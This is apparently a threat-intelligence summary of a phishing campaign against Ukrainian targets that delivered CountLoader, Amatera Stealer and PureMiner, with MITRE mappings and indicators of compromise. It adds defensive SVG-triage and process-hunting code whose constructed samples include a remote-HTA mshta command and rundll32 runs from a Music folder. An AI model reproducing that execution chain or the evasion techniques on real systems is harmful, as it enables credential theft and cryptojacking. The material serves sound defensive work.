FortiGuard Labs observed a phishing campaign impersonating Ukrainian government agencies that used malicious SVG attachments to deliver a CHM → HTA loader (CountLoader) which fetched and executed fileless payloads Amatera Stealer and PureMiner. The campaign enabled data exfiltration (credentials, browser and wallet files, system info) and resource hijacking for cryptomining via techniques like process hollowing, .NET AOT execution, and in-memory Python loading. #Amatera #PureMiner
Keypoints
- Phishing emails spoofed Ukrainian authorities and used a malicious SVG attachment that loaded an external SVG to display a spoofed Adobe Reader page and prompt a password-protected archive download.
- The downloaded archive contained a CHM that executed a remote HTA (CountLoader), which connected to a C2 and supported commands to download/extract/execute payloads, perform domain reconnaissance, and remove tasks.
- Two ZIP archives were delivered: ergosystem.zip (PureMiner) used DLL sideloading, .NET AOT, and process hollowing to run an in-memory cryptominer; smtpB.zip (Amatera Stealer) used a Python interpreter and PythonMemoryModule to load the stealer into memory.
- Amatera Stealer harvested extensive data including system info, browser (Gecko/Chromium) data and cookies (with legacy DPAPI and ABE decryption techniques), cryptocurrency wallets, Steam/Telegram data, and arbitrary files per configuration rules.
- PureMiner collected GPU/CPU adapter details via AMD/NVIDIA APIs and registry queries, validated system memory, communicated with C2 using 3DES-encrypted protobuf configuration, and could deploy CPU/GPU mining modules and anti-analysis checks.
- Both payloads operated filelessly (in-memory execution) and used obfuscation, encryption (RC4 for configuration in Amatera), and serialized/encrypted communication to evade detection.
- Fortinet protections detect components of this campaign across FortiGate, FortiMail, FortiClient, and FortiEDR, and FortiGuard services block the identified threats and phishing infrastructure.
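The initial vector above is an SVG attachment that loads an external SVG and carries active content. As an added example (not FortiGuard's code, and the sample documents are constructed rather than campaign files), here is a static triage check that flags those behaviours in an attachment before it reaches a mail client:

```python
# Static triage of SVG attachments for the two behaviours this campaign abused:
# pulling an external SVG/image and carrying active content. Added example, not
# FortiGuard's code; the sample documents are constructed, not campaign files.
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
EXTERNAL_TAGS = {"image", "use", "feImage"}               # can fetch remote content
ACTIVE_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
REMOTE_SCHEMES = ("http://", "https://", "//")

def _local(tag):
    # '{http://www.w3.org/2000/svg}image' -> 'image'
    return tag.rsplit("}", 1)[-1]

def _href(elem):
    return (elem.get("href") or elem.get(XLINK_HREF) or "").strip()

def triage_svg(svg_text):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [f"unparseable SVG: {exc}"]
    findings = []
    for elem in root.iter():
        tag, href = _local(elem.tag), _href(elem)
        if tag in ACTIVE_TAGS:
            findings.append(f"active content element <{tag}>")
        if tag in EXTERNAL_TAGS and href.lower().startswith(REMOTE_SCHEMES):
            findings.append(f"<{tag}> loads external resource {href}")
        if href.lower().startswith("javascript:"):
            findings.append(f"<{tag}> uses a javascript: URI")
        for attr in elem.attrib:
            if _local(attr).lower().startswith("on"):      # onload, onclick, ...
                findings.append(f"<{tag}> has event handler {attr}")
    return findings

# Constructed samples: a plain icon, and a decoy that loads a remote SVG and runs script.
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>'
DECOY_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" onload="go()">'
             '<image href="https://example.invalid/stage2.svg"/>'
             '<script>/* redirect placeholder */</script></svg>')

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_SVG), ("decoy", DECOY_SVG)):
        print(name, triage_svg(doc) or "clean")
```

A mail gateway can quarantine any SVG that produces findings, or strip the attachment and deliver only a notice.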
MITRE Techniques
- [T1566] Phishing – Malicious emails impersonated Ukrainian government agencies and included an SVG attachment prompting the victim to open a password-protected archive (“…the phishing emails contain malicious Scalable Vector Graphics (SVG) files designed to trick recipients into opening harmful attachments…”).
- [T1204] User Execution – The SVG displayed a spoofed Adobe Reader interface to convince users to extract and open the bundled CHM/HTA (“…it displays a spoofed Adobe Reader interface with the message ‘Please wait, your document is loading…’ and automatically redirects the victim to a download page…”).
- [T1218] System Binary Proxy Execution (rundll32, msiexec, etc.) – CountLoader supports commands to execute downloaded DLLs with rundll32 and MSI with msiexec (“…Download a DLL to the %userprofile%\Music directory and execute it with rundll32…Download an MSI file to the %userprofile%\Music directory and execute it with msiexec.exe.”).
- [T1047] Windows Management Instrumentation and API Abuse – PureMiner queries AMD/NVIDIA libraries and registry keys for video adapter details to determine mining suitability (“…uses APIs from the AMD Display Library (atiadlxx.dll / atiadlxy.dll) and NVIDIA library (nvapi.dll / nvapi64.dll)…can also query video adapter information directly from the system registry…”).
- [T1055] Process Injection – The ergosystem.zip payload decrypts and injects its payload into a created .NET Framework tool process using process hollowing (“…decrypted and then injected into a newly created .NET Framework tool process using process hollowing.”).
- [T1620] Reflective Code Loading (in-memory execution) – smtpB.zip used PythonMemoryModule to load Amatera Stealer directly into memory without writing to disk (“…loading the payload directly into memory without writing it to disk. To achieve this, it uses the PythonMemoryModule project from GitHub.”).
- [T1112] Modify Registry – Amatera locates Steam installation and other application paths via registry keys to harvest files (“…locates the Steam installation path in the registry under: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Valve\Steam…”).
- [T1537] Transfer Data to Cloud Account – Amatera exfiltrates harvested data via repeated HTTP POST requests to its C2 endpoints (“/core/sendPart”) (“…each data category is sent via separate HTTP POST requests to the /core/sendPart endpoint…”).
- [T1505] Server Software Component, SCM/Service Execution – Use of DLL sideloading by a trusted executable to load malicious DLLs in ergosystem.zip (“…DLL sideloading is used: a trusted executable loads a malicious DLL.”).
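The T1204/T1218 entries describe a process chain (CHM help viewer spawning mshta.exe, which then runs rundll32 or msiexec against a file under %userprofile%\Music) that is visible in process-creation telemetry. The following hunting logic is an added example rather than FortiGuard's detection content; the Sysmon-style field names and the sample events are assumptions constructed for the demonstration:

```python
# Hunting logic for the CHM -> HTA -> rundll32/msiexec chain described above, run over
# process-creation events. Added example, not FortiGuard's detection content; the
# Sysmon-style field names and the sample events are assumptions/constructed.
import ntpath

# parent -> children that are suspicious when spawned from it
CHAIN = {"hh.exe": {"mshta.exe"}, "mshta.exe": {"rundll32.exe", "msiexec.exe"}}
PROXY_BINARIES = {"rundll32.exe", "msiexec.exe"}
DROP_DIR = "\\music\\"      # CountLoader stages payloads under %userprofile%\Music

def _image(path):
    return ntpath.basename(path).lower()

def evaluate(event):
    """Return the rule hits for one event; an empty list means the event is not flagged."""
    parent, child = _image(event["ParentImage"]), _image(event["Image"])
    cmd = event.get("CommandLine", "").lower()
    hits = []
    if child in CHAIN.get(parent, ()):
        hits.append(f"{parent} spawned {child}")
    if child == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
        hits.append("mshta.exe fetching a remote HTA")
    if child in PROXY_BINARIES and "\\users\\" in cmd and DROP_DIR in cmd:
        hits.append(f"{child} executing a file from a user Music folder")
    return hits

def hunt(events):
    """Return (index, hits) for every event that triggers at least one rule."""
    return [(i, h) for i, e in enumerate(events) if (h := evaluate(e))]

# Constructed events mirroring the reported chain plus two benign look-alikes.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\hh.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\alice\Downloads\document.chm'},
    {"ParentImage": r"C:\Windows\hh.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe https://example.invalid/loader.hta"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\Music\stage.dll,Start"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /V"},
]

if __name__ == "__main__":
    for idx, hits in hunt(EVENTS):
        print(idx, EVENTS[idx]["CommandLine"], "->", "; ".join(hits))
```

The benign rundll32 and msiexec events are included to show that the rules key on the parent and the staging directory, not on the binary name alone.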
Indicators of Compromise
- [Domain] phishing infrastructure and download hosts – npulvivgov.cfdms-team-ping1.com, azure-expresscontainer3.com (examples; the campaign uses domains with numbered variations).
- [Domain] additional malicious domains – acqua-tecnica.it, phuyufact.com (examples listed as infrastructure and drop sites).
- [IP] hosting/malicious servers – 109.176.207.110 (example IP observed for campaign infrastructure).
- [File name] initial attachment and archives – elektronni_zapit_NPU.svg (malicious SVG attachment), ergosystem.zip and smtpB.zip (downloaded archives delivering PureMiner and Amatera Stealer).
- [File hash] malicious payloads – SHA-256 hash beginning bcce8115…4369 (one example; the full report lists many more hashes and other long entries).